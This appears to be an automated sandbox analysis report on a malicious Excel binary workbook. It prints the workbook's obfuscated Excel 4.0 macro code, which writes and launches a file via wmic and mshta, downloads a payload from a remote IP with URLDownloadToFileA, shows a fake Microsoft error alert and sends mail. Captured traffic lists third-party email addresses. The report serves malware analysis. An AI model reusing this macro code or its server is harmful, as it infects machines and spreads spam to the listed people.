                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "474556085436219490680.xlsb"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    0,564,=FOPEN("C:\Prog" & CHAR(114) & "amD" & CHAR(97) & CHAR(116) & "a\UXc" & CHAR(113) & "TE.rt" & CHAR(102), 3)
                                                                                                                                                    1,564,=B9905+D8740
                                                                                                                                                    2,564,=C1238+B4409
                                                                                                                                                    3,564,=B923+B4574
                                                                                                                                                    4,564,=C6510+B1598
                                                                                                                                                    7,564,=A6741+B9352
                                                                                                                                                    8,564,=D3777+D7437
                                                                                                                                                    9,564,=D6862+B4052
                                                                                                                                                    11,564,=A7938+B9966
                                                                                                                                                    12,564,=FOR.CELL("NmOpRVhwYsynOr",Sheet1!AX155:AY2501, TRUE)
                                                                                                                                                    13,564,=C7781+A7255
                                                                                                                                                    19,564,=A6275+A4831
                                                                                                                                                    21,564,=C5227+B9489
                                                                                                                                                    22,564,=B2160+D9087
                                                                                                                                                    23,564,=B3501+A7950
                                                                                                                                                    26,564,=C8748+B4848
                                                                                                                                                    27,564,=FWRITE(0,CHAR(NmOpRVhwYsynOr))
                                                                                                                                                    28,564,=C2889+B9165
                                                                                                                                                    30,564,=C3586+B7711
                                                                                                                                                    32,564,=A4353+B2779
                                                                                                                                                    33,564,=B7575+B1601
                                                                                                                                                    34,564,=C9283+A7819
                                                                                                                                                    36,564,=B3043+B1047
                                                                                                                                                    37,564,=D3839+D7513
                                                                                                                                                    39,564,=A8184+B4998
                                                                                                                                                    41,564,=C1684+C3659
                                                                                                                                                    42,564,=NEXT()
                                                                                                                                                    43,564,=B9929+B137
                                                                                                                                                    44,564,=C6629+D9381
                                                                                                                                                    45,564,=C5260+C5889
                                                                                                                                                    46,564,=A7257+D1136
                                                                                                                                                    47,564,=D5914+D2482
                                                                                                                                                    48,564,=A8619+B8530
                                                                                                                                                    49,564,=C3572+D9249
                                                                                                                                                    50,564,=C4151+B8690
                                                                                                                                                    54,564,=B2434+C4212
                                                                                                                                                    55,564,=C482+D9659
                                                                                                                                                    56,564,=EXEC("" & CHAR(119) & "mi" & CHAR(99) & CHAR(32) & CHAR(112) & "rocess c" & CHAR(97) & CHAR(108) & "l c" & CHAR(114) & "eate" & CHAR(32) & CHAR(34) & CHAR(109) & "sh" & CHAR(116) & "a C:\Progr" & CHAR(97) & "mData\UXcqT" & CHAR(69) & ".rtf" & CHAR(34))
                                                                                                                                                    59,564,=B7613+B4271
                                                                                                                                                    60,564,=C1615+C5035
                                                                                                                                                    62,564,=B5594+C7714
                                                                                                                                                    64,564,=B1491+D7320
                                                                                                                                                    65,564,=A3521+B3137
                                                                                                                                                    66,564,=A4536+C4396
                                                                                                                                                    67,564,=D3670+D9363
                                                                                                                                                    68,564,=CALL("urlmo" & CHAR(110) & "", "URLDo" & CHAR(119) & CHAR(110) & "loadToF" & CHAR(105) & "leA",CHAR(74) & "JCCJJ", 0, CHAR(104) & "ttp:" & CHAR(47) & "/13" & CHAR(50) & ".148.135." & CHAR(49) & CHAR(56) & CHAR(51) & CHAR(58) & CHAR(56) & "080/Q2W5V" & CHAR(87) & "UFL5V" & CHAR(67) & "MQ7JQPET" & CHAR(71) & "3CCTYX72Z4R2" & CHAR(53) & "PD" & CHAR(71), "C:\Progra" & CHAR(109) & "Dat" & CHAR(97) & "\V" & CHAR(78) & "sYnsilCvEhxr.tx" & CHAR(116),0,0)
                                                                                                                                                    69,564,=B3784+A4994
                                                                                                                                                    70,564,=A9216+C1127
                                                                                                                                                    71,564,=A6561+C6544
                                                                                                                                                    72,564,=A9994+D8883
                                                                                                                                                    74,564,=A3572+D6307
                                                                                                                                                    75,564,=D8465+C2674
                                                                                                                                                    78,564,=D4320+A7865
                                                                                                                                                    81,564,=ALERT(CHAR(69) & "rr" & CHAR(111) & "r! Sendin" & CHAR(103) & " report t" & CHAR(111) & CHAR(32) & CHAR(77) & "ic" & CHAR(114) & CHAR(111) & CHAR(115) & CHAR(111) & CHAR(102) & "t.." & CHAR(46))
                                                                                                                                                    82,564,=A5310+B8811
                                                                                                                                                    89,564,=C2301+C4609
                                                                                                                                                    92,564,=C5498+D2989
                                                                                                                                                    93,564,=B4251+A6499
                                                                                                                                                    95,564,=FOPEN("C:\" & CHAR(80) & "rog" & CHAR(114) & "amDat" & CHAR(97) & "\VNsYnsilCvE" & CHAR(104) & CHAR(120) & "r.tx" & CHAR(116),1)
                                                                                                                                                    101,564,=A5700+B7332
                                                                                                                                                    104,564,=C3184+D4013
                                                                                                                                                    105,564,=SEND.MAIL(EVALUATE(FREAD(US96,255)))
                                                                                                                                                    108,564,=D8160+D2803
                                                                                                                                                    109,564,=A7662+C8022
                                                                                                                                                    110,564,=D7756+C1960
                                                                                                                                                    112,564,=A3160+D2457
                                                                                                                                                    114,564,=A5432+A881
                                                                                                                                                    117,564,=RETURN()
                                                                                                                                                    

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 25, 2021 08:28:47.072992086 CET497458080192.168.2.3132.148.135.183
                                                                                                                                                    Nov 25, 2021 08:28:47.230662107 CET808049745132.148.135.183192.168.2.3
                                                                                                                                                    Nov 25, 2021 08:28:47.230882883 CET497458080192.168.2.3132.148.135.183
                                                                                                                                                    Nov 25, 2021 08:28:47.232094049 CET497458080192.168.2.3132.148.135.183
                                                                                                                                                    Nov 25, 2021 08:28:47.389451981 CET808049745132.148.135.183192.168.2.3
                                                                                                                                                    Nov 25, 2021 08:28:47.684127092 CET808049745132.148.135.183192.168.2.3
                                                                                                                                                    Nov 25, 2021 08:28:47.684298992 CET497458080192.168.2.3132.148.135.183
                                                                                                                                                    Nov 25, 2021 08:30:02.691849947 CET808049745132.148.135.183192.168.2.3
                                                                                                                                                    Nov 25, 2021 08:30:02.691962957 CET497458080192.168.2.3132.148.135.183

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 132.148.135.183:8080

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349745132.148.135.1838080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 25, 2021 08:28:47.232094049 CET993OUTGET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 132.148.135.183:8080
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 25, 2021 08:28:47.684127092 CET994INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.0.15
                                                                                                                                                    Date: Thu, 25 Nov 2021 07:28:47 GMT
                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 146
                                                                                                                                                    Data Raw: 7b 22 63 61 72 6c 74 6f 6e 40 67 6c 6f 76 65 73 2d 69 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 2e 63 6f 6d 22 2c 22 64 61 72 72 65 6e 40 64 61 72 72 65 6e 74 65 72 72 79 2e 63 6f 6d 22 2c 22 6a 65 66 66 40 6d 63 65 6c 77 61 69 6e 65 67 72 6f 75 70 2e 63 6f 6d 22 2c 22 69 6e 66 6f 40 74 68 65 68 69 67 68 6c 6f 6e 65 73 6f 6d 65 72 61 6e 63 68 2e 63 6f 6d 22 2c 22 62 6b 6f 73 73 75 74 68 40 66 63 63 66 61 69 74 68 66 75 6c 2e 6f 72 67 22 7d
                                                                                                                                                    Data Ascii: {"carlton@gloves-international.com","darren@darrenterry.com","jeff@mcelwainegroup.com","info@thehighlonesomeranch.com","bkossuth@fccfaithful.org"}


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:08:27:53
                                                                                                                                                    Start date:25/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                    Imagebase:0x830000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:08:28:46
                                                                                                                                                    Start date:25/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:wmic process call create "mshta C:\ProgramData\UXcqTE.rtf"
                                                                                                                                                    Imagebase:0x1360000
                                                                                                                                                    File size:391680 bytes
                                                                                                                                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:08:28:46
                                                                                                                                                    Start date:25/11/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7f20f0000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:08:28:47
                                                                                                                                                    Start date:25/11/2021
                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:mshta C:\ProgramData\UXcqTE.rtf
                                                                                                                                                    Imagebase:0x7ff61e8a0000
                                                                                                                                                    File size:14848 bytes
                                                                                                                                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >